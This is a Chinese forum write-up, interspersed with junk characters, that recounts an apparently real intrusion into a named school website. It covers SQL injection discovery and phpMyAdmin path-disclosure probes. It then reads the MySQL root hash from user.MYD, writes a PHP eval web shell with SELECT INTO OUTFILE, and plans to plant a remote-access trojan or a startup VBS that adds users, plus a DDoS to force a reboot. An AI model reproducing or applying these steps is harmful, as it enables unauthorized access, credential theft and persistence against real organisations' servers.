第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏: _' n; K& L( x/ \7 R
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!" F) |5 B2 E4 i/ f# s% ?
2 `, Z4 \: }8 N& m2 {& R' J/ e" N8 S. t t6 A7 W, {1 m
# s+ M, @! s) F9 |9 Y+ G" X$ q常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 , m* e$ [8 B! b1 @) D1 s# y0 E
+ {2 |7 F/ x6 F6 v I0 K8 q1 L- }那么想可以直接写入shell ,getshell有几个条件:
, W# C% B$ E7 m+ ^1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF ' H. ?8 G D& U5 y% H
, W/ C7 M3 @- a0 R( F1 ~+ K" e
试着爆绝对路径: ; i0 z4 k( [8 o
1./phpMyAdmin/index.php?lang[]=1
" L+ S, r% F: R) a: `" J2./phpMyAdmin/phpinfo.php $ `$ Q1 n X0 [5 T3 |( X* j
3./load_file() 7 K. S) j+ |3 _6 n$ _3 ]
4./phpmyadmin/themes/darkblue_orange/layout.inc.php 8 M% A5 H" q* A: i# _& A! I; m& ]
5./phpmyadmin/libraries/select_lang.lib.php ( z) i- J0 U$ y# }1 e( M5 b
6./phpmyadmin/libraries/lect_lang.lib.php ; A, }- k: ?9 ]
7./phpmyadmin/libraries/mcrypt.lib.php / k/ Y6 q$ z6 ^/ k. E5 G- o. L; _
8./phpmyadmin/libraries/export/xls.php l& w) I1 Z' v4 @! q! I! S
, @; ?/ n* Z, z# x1 I均不行...........................
5 R0 l3 B6 E$ d" l6 e$ k8 ?# {" [( o( ]
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
/ Q7 h9 y6 t6 C. o' k# y* Y! `. g5 X- G% C* x
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin ; t6 A4 K! U( \8 c V w. |) p
* M6 G9 N1 K; s; q0 L
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 3 P5 E8 J: R' c# v( ~, h
; o. M9 B, c7 A) m( F g敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... 6 ?$ p! q% d# _. [' ^- ^ [: X
5 H0 H' g2 v/ P5 n想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
3 l) {. U- v! u% j
5 H1 k( v# j/ d5 ?( t; rhttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
) ]( k* \- m4 W" j( V5 c+ n; C, D5 i8 m
J: h+ j7 g! m9 F/ k U0 J自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
: g- O9 Z9 S; z- V: d
2 P: @& a* ~9 W8 D" r: g1 K% Z成功读到root密码:
" ?. }9 i, C3 E0 F
7 w! b: j X6 z# y17---- r(0072)
' V/ O, i7 W: x5 g2 f/ L18---- o(006f)
$ h# k. ~( e1 ^0 H$ f) p19---- o(006f) 5 A+ h2 E$ i3 q* q7 M( c- i
20---- t(0074)
0 L$ z5 K" R. N1 v1 S8 ]) E) e2 \21---- *(002a) & U3 n% y# R0 Q, C1 M/ D
22---- 8(0038)
) Q( n. M) C2 w8 Y% K0 I8 o23---- 2(0032) " h) Z: I0 n' {+ }5 H1 g8 g; m, H
24---- E(0045)
( `7 M+ }4 {6 E, P: H25---- 1(0031) / R6 C" q3 Q- [ b: r: s
26---- C(0043)
* M9 U$ E( J! ^' T# l4 |( R27---- 5(0035)
1 @5 m+ G$ t) y( B28---- 8(0038)
9 Y$ v% T4 }6 o! v* i; S1 D! v29---- 2(0032)
4 \) x4 W5 |8 M- {$ f0 Q) s30---- 8(0038) 3 q7 P3 o1 \. ?
31---- A(0041) 6 W) ^% N. _1 i3 s: Z7 b
32---- 9(0039)
" J1 v& ` ^7 u- R, B33---- B(0042) 3 K+ m3 n/ `9 Y- i3 j
34---- 5(0035)
4 Z- R1 j" S o35---- 4(0034) 1 H: w; M D i: {$ j
36---- 8(0038) " Y' a. `0 u3 b' V, |4 {1 m2 i$ c0 y" Y
37---- 6(0036)
2 C( ], L4 V- {3 r7 q" Y- T7 l38---- 4(0034) 7 g G; M& u; y# c! }% r& t3 p
39---- 9(0039)
- _0 l N- Z$ ^3 u6 W, z40---- 1(0031)
7 T/ T. ^7 K; ]4 R( H41---- 1(0031)
3 v& n: ~; g F! k2 o42---- 5(0035) # T0 U3 Q/ E) R+ _! v& ?* @ H1 [
43---- 3(0033) ! ]# m/ j7 R" Y5 z
44---- 5(0035)
5 U# y6 T+ i: q2 |. G8 U45---- 9(0039) 4 z `7 _- Z3 E2 s- b
46---- 8(0038)
+ V o; Q# D1 x" ?( C s47---- F(0046)
- Q8 G) Q, |3 M+ [* N w# b8 L48---- F(0046) 6 t# t" k- t5 c# ]
49---- 4(0034)
- h2 Q5 E) `5 ?50---- F(0046)
" j7 ?: S9 x1 \! {8 `51---- 0(0030) * O! q% W+ a3 I1 z
52---- 3(0033)
6 \3 X# J9 z+ M F) e$ A" F53---- 2(0032)
" _3 L) L$ p" J$ H- E/ p54---- A(0041) & g0 C' T2 L# o) C
55---- 4(0034)
* j% r+ s3 X; f' H" ~- }7 N' b56---- A(0041)
- t- @! A% g4 ]9 U57---- B(0042)
& H5 _' O$ d2 Q5 m% ` T) N58---- *(0044)
4 M' H* `% |" O59---- *(0035)
% j4 a! s) l. H60---- *(0041) , A. F1 X& Y2 c% r$ _+ C
61---- *0032)
, {; W: ^4 ~5 o' w, m8 \
6 U" m; e) f. t: d解密后成功登陆phpmyamin 8 f1 J' V9 V+ }+ ]; n4 @
4 M" C% q1 G5 a! n# i+ I
) b- i! z) a! T$ ^- U
7 T' e& q5 ^* A* z5 R$ l: U3 ?% o# F# Z& h2 K
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' - W1 u/ s2 {8 ~6 I% V1 M
) o: [$ `; a$ N% ` l6 R7 M成功执行,拿下shell,菜刀连接:
# i' l: ~* H% f5 g
" `3 O4 l) w5 B: q3 u' f( k服务器不支持asp,aspx,php提权无果...................
+ Z( z3 T" z* x( E
+ s8 u5 B, v7 y2 O但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
1 D+ v1 u9 O. Q# q& Z( ^服务器上已经有个隐藏帐号了 a0 _7 s: I8 N* U3 {
别名 administrators
* e$ u, n- g& d注释 管理员对计算机/域有不受限制的完全访问权
% s* I2 @# S& c( F P成员
4 R+ w5 |, q f, G+ _-------------------------------------------------------------------------------; ]& G O6 q% C) Y
admin; X. r8 o" x* k/ G; t' C8 _
Administrator
" N! l: x! I) J. t2 Mslipper$
1 f. g- p) J. Gsqluser
3 F1 ~9 ~6 F' l9 y/ ^2 Q命令成功完成。 + P' I+ J0 l& @( I0 ]' d- [; R% s
; s/ p7 U7 }8 m! h, A. F" u
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。" l* g1 R' c3 }& P+ @
: R+ q1 n& {( {ddos服务器重启,不然就只能坐等服务器重启了...............................4 n1 c4 u# B3 R2 b$ v9 ?6 Z
. J" k# E% @- t# |7 s
! Y( Q3 s8 g: F& L6 F1 Q! t
|